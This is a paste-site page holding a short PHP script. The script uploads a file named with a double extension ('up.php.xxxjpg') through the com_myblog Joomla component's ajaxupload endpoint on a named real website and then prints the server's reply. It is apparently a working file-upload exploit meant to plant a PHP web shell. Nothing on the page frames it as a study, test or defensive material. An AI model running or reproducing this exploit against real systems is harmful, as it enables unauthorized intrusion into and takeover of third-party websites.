SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | $uploadfile="up.php.xxxjpg"; | |
| 3 | ||
| 4 | ||
| 5 | $ch = curl_init("http://www.rolnicze-maszyny.pl//index.php?option=com_myblog&task=ajaxupload");
| |
| 6 | curl_setopt($ch, CURLOPT_POST, true); | |
| 7 | curl_setopt($ch, CURLOPT_POSTFIELDS, | |
| 8 | array('fileToUpload'=>"@$uploadfile"));
| |
| 9 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
| 10 | $postResult = curl_exec($ch); | |
| 11 | curl_close($ch); | |
| 12 | print "$postResult"; | |
| 13 | ||
| 14 | ?> |